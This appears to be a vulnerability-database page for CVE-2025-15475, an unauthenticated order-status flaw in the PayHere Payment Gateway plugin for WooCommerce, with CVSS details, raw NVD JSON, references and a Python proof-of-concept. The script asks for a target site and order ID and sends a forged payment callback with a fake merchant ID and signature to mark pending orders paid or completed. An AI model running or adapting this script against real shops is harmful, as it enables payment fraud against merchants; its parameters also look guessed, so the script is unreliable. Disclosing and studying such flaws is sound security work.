Security Vulnerability Report
中文
CVE-2025-15475 CVSS 5.3 MEDIUM

CVE-2025-15475

Published: 2026-01-14 07:16:14
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The PayHere Payment Gateway Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to an improper validation logic in the check_payhere_response function in all versions up to, and including, 2.3.9. This makes it possible for unauthenticated attackers to change the status of pending WooCommerce orders to paid/completed/on hold.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PayHere Payment Gateway Plugin for WooCommerce <= 2.3.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-15475 PoC - PayHere Payment Gateway Plugin Unauthorized Order Status Modification This PoC demonstrates how an unauthenticated attacker can modify WooCommerce order status through the vulnerable check_payhere_response function. """ import requests import json import sys TARGET_URL = "https://vulnerable-site.com/" TARGET_URL = input("Enter target URL: ").strip().rstrip("/") def send_malicious_callback(order_id, status): """ Send malicious callback to change order status The vulnerable plugin doesn't properly validate the callback request """ endpoint = f"{TARGET_URL}/?wc-api=wc_gateway_payhere" # Malicious callback parameters # The plugin checks 'status' parameter without proper validation payload = { 'order_id': order_id, 'status': status, # Can be: 'paid', 'completed', 'on-hold' 'merchant_id': 'malicious_merchant', 'payhere_amount': '0.01', # Minimal amount 'payhere_currency': 'LKR', 'payment_id': 'PAY' + str(order_id), 'md5sig': 'fake_signature' # Not properly validated } print(f"[*] Sending malicious callback for order {order_id}") print(f"[*] Attempting to change status to: {status}") try: response = requests.get(endpoint, params=payload, timeout=10) print(f"[+] Request sent. Status code: {response.status_code}") return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def main(): print("=" * 60) print("CVE-2025-15475 PoC - PayHere Payment Gateway for WooCommerce") print("Unauthenticated Order Status Modification") print("=" * 60) order_id = input("Enter target WooCommerce order ID: ").strip() if not order_id.isdigit(): print("[-] Invalid order ID. Please enter a numeric value.") sys.exit(1) print("\n[*] Available status changes:") print(" 1. paid - Change to Paid status") print(" 2. completed - Change to Completed status") print(" 3. on-hold - Change to On Hold status") choice = input("Select status (1/2/3): ").strip() status_map = {'1': 'paid', '2': 'completed', '3': 'on-hold'} status = status_map.get(choice, 'paid') response = send_malicious_callback(order_id, status) if response and response.status_code == 200: print("[+] Callback sent successfully!") print("[+] If the order exists and was pending, its status may have been changed.") print("\n[*] Mitigation: Upgrade PayHere Payment Gateway Plugin to version 2.4.0 or later") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15475", "sourceIdentifier": "[email protected]", "published": "2026-01-14T07:16:14.063", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PayHere Payment Gateway Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to an improper validation logic in the check_payhere_response function in all versions up to, and including, 2.3.9. This makes it possible for unauthenticated attackers to change the status of pending WooCommerce orders to paid/completed/on hold."}, {"lang": "es", "value": "El plugin de pasarela de pago PayHere para WooCommerce plugin para WordPress es vulnerable a la modificación no autorizada de datos debido a una lógica de validación incorrecta en la función check_payhere_response en todas las versiones hasta la 2.3.9, inclusive. Esto hace posible que atacantes no autenticados cambien el estado de pedidos pendientes de WooCommerce a pagado/completado/en espera."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/payhere-payment-gateway/tags/2.3.9/gateway/class-wcgatewaypayhere.php#L709", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440771%40payhere-payment-gateway&new=3440771%40payhere-payment-gateway&sfp_email=&sfph_mail=#file10", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e0c92241-0bef-4f87-8478-4d805435f09d?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.